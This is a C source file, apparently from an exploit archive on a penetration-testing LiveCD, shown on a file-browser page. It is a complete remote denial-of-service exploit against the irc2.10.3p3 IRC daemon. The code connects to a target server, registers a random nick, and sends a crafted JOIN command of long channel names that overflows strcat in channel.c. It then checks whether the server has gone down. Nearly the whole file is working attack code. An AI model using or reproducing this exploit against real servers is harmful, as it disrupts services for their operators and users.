home *** CD-ROM | disk | FTP | other *** search
/ Chip 2007 January, February, March & April / Chip-Cover-CD-2007-02.iso / Pakiet bezpieczenstwa / mini Pentoo LiveCD 2006.1 / mpentoo-2006.1.iso / livecd.squashfs / opt / pentoo / ExploitTree / application / irc / mauer.c < prev   
Encoding:
C/C++ Source or Header  |  2005-02-12  |  4.5 KB  |  189 lines
  1. /** irc2.10.3p3 and maybe below remote DOS exploit by millhouse **
  2.   
  3.    Exploit uses a bug in channel.c that happens while handling
  4.    a specially crafted JOIN command.
  5.  
  6.    Program received signal SIGSEGV, Segmentation fault.
  7.    0x40108f05 in strcat () from /lib/libc.so.6
  8.  
  9.    As u can see the overflow happens while dealing with strcat().
  10.    After a few hours of debugging and testing i'll carefully say
  11.    that there is no way to control the functions EIP to make a
  12.    code execution possible.
  13.  
  14.    I didnt checked for this bug in other/modified versions of the
  15.    IRC deamon so its possible that some of them are vulnerable too.
  16.    Smarties should read the coredump to get more informations.
  17.  
  18.    Greets to: servie - (the man with the drastic knowledge)
  19.               0 - (helper in asm and debuggin' things)
  20.               lordi - (also known as erklΣrbΣr)
  21.               error - (i promised it)
  22.               hidro, lexxor, tgt, mspcshl, coco, tobias...
  23.  
  24.      THIS IS A PROOF OF CONCEPT. HANDLE THIS SOURCE WITH CARE!
  25.    /*********************************************07\\10\\2003*/
  26.  
  27. #include <stdlib.h>
  28. #include <stdio.h>
  29. #include <string.h>
  30. #include <arpa/inet.h>
  31. #include <sys/types.h>
  32. #include <sys/socket.h>
  33. #include <netinet/in.h>
  34. #include <getopt.h>
  35. #include <netdb.h>
  36.  
  37. int sckfd;
  38. int sockopen(char *host, int port)
  39. {
  40.     struct sockaddr_in addr;
  41.     struct hostent *he;
  42.     he=gethostbyname(host);
  43.  
  44.     if (he==NULL)
  45.     {
  46.         fprintf(stderr, "[-] cant handle host ..\n");
  47.         exit(1);
  48.     }
  49.  
  50.     memcpy(&addr.sin_addr, he->h_addr, he->h_length);
  51.     addr.sin_family=AF_INET;
  52.     addr.sin_port=htons(port);
  53.  
  54.     sckfd = socket(AF_INET, SOCK_STREAM, getprotobyname("tcp")->p_proto);
  55.     if(connect(sckfd, (struct sockaddr *)&addr, sizeof(addr)) == -1) sckfd=-1;
  56.  
  57.     return sckfd;
  58. }
  59.  
  60. char *makestring(int len)
  61. {
  62.     char *tmp;
  63.     int i;
  64.     tmp = (char*) malloc(len+1);
  65.     memset(tmp,0,len+1);
  66.     for (i=0;i<len;i++) tmp[i]=(random()%(122-97))+97;
  67.     return tmp;
  68. }
  69.  
  70. void usage(char *pname)
  71. {
  72.     fprintf(stderr, "usage: %s -hp\n", pname);
  73.     fprintf(stderr, "\t-h <host/ip> of the ircd\n\t-p <port> default is 6667\n\n");
  74.     fprintf(stderr, "\tremember that the IP the exploit is running at must\n");
  75.     fprintf(stderr, "\tmatch to a servers I-Line, else this exploit will fail..\n\n");
  76.     exit(1);
  77. }
  78.  
  79. int main(int argc, char *argv[])
  80. {
  81.     int opt,i;
  82.     int port=6667;
  83.     char host[256];
  84.     char request[1024], buffer[600];
  85.     char reply[2000];
  86.     char *name, *string;
  87.     struct sockaddr_in addr;
  88.     struct hostent *he;
  89.     srandom(time(NULL));
  90.     
  91.     fprintf(stdout, "irc2.10.3p3 remote dos exploit delivered by millhouse\n");
  92.     fprintf(stdout, "-----------------------------------------------------\n");
  93.     
  94.     memset(host, 0x00, sizeof(host));
  95.     memset(request, 0x00, sizeof(request));
  96.     memset(buffer, 0x00, sizeof(buffer));
  97.     memset(reply, 0x00, sizeof(reply));
  98.     
  99.     while((opt=getopt(argc,argv,"h:p:")) !=EOF)
  100.     {
  101.         switch(opt)
  102.         {
  103.         case 'h':
  104.             strncpy(host, optarg, sizeof(host)-1);
  105.             break;
  106.         case 'p':
  107.             port=atoi(optarg);
  108.             break;
  109.         default:
  110.             usage(argv[0]);
  111.             break;
  112.         }
  113.     }
  114.  
  115.     if(argc < 2)
  116.     {
  117.         usage(argv[0]);
  118.     }
  119.  
  120.     if((port <= 0) || (port > 65535))
  121.     {
  122.         fprintf(stderr,"[-] invalid port ..\n");
  123.         exit(1);
  124.     }
  125.  
  126.     sckfd=sockopen(host, port);
  127.     
  128.     if(sckfd < 0)
  129.     {
  130.         fprintf(stderr, "[-] cant connect to %s:%d ..\n", host, port);
  131.         exit(1);
  132.     }
  133.  
  134.     fprintf(stdout, "[x] connected to %s:%d ..\n", host, port);
  135.                 
  136.     name = makestring(9);
  137.     fprintf(stdout, "[x] trying to logon with nick %s ..\n", name);
  138.     snprintf(request, sizeof(request) -1, "USER %s localhost localhost mauer\r\n"
  139.                                           "NICK %s\r\n",name, name);
  140.  
  141.     write(sckfd, request, strlen(request));
  142.         
  143.     // checks simply if we are allowed to connect or not, a restricted
  144.     // connection doesn't bother us.
  145.     while(1)
  146.     {
  147.         recv(sckfd, reply, sizeof(reply), 0);
  148.         if(strstr(reply, "ERROR"))
  149.         {
  150.             fprintf(stderr, "[-] we dont have access, exploit failed ..\n");
  151.             exit(1);
  152.         }
  153.         if(strstr(reply, "MOTD"))
  154.         {
  155.             fprintf(stdout, "[x] we're logged on, sending evil data ..\n");
  156.             break;
  157.         }
  158.     }
  159.             
  160.     // lets build the join comand and pull it out. open your
  161.     // eyes, the root of all evil..
  162.       for(i=0;i<9;i++)
  163.     {
  164.         string = makestring(50);
  165.         strcat(buffer, "!#");
  166.         strcat(buffer, string);
  167.         strcat(buffer, ",");
  168.     }
  169.  
  170.     string = makestring(5);
  171.     strcat(buffer, "#");
  172.     strcat(buffer, string);
  173.     
  174.     snprintf(request, sizeof(request) -1, "JOIN %s\r\n", buffer);
  175.     write(sckfd, request, strlen(request));
  176.  
  177.     close(sckfd);
  178.     sleep(1);
  179.     
  180.     if (sockopen(host, port) > 0) {
  181.         fprintf(stderr, "[-] exploit failed, exiting ..\n");
  182.         close(sckfd);
  183.         exit(1);
  184.     }
  185.  
  186.     fprintf(stdout, "[x] exploit worked, irc unreachable ..\n");
  187.     return 0;
  188. }
  189.